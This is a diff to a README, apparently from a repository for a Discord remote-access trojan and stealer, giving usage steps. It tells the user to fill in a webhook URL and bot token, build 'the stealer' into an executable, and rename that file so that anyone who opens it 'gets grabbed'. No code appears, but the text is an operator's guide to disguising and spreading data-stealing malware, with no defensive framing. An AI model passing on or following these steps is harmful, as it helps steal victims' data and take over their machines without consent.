UnsillyHaxor/Snorm-Spy-Discord-RAT/README.md

 # HOW TO USE.

 DOWNLOAD THE FILE AS A WHOLE ( AS A ZIP ).
 OPEN "getrequirements.bat", wait for it to download.
 Then open setup.py, put it in your webhook url and your bot token.
 It will then build the stealer and a new py file called built_main will be made.
-Once the file is made, "built_main" will be made but as an exe file, you can rename the exe file and if anyone opens the file, they get grabbed.
+Once the file is made, it opens a yt link ( tutorial to convert py to exe ) ,  you can rename the exe file and if anyone opens the file, they get grabbed.

 **NOTE : MAKE SURE TO EXTRACT THE FOLDER**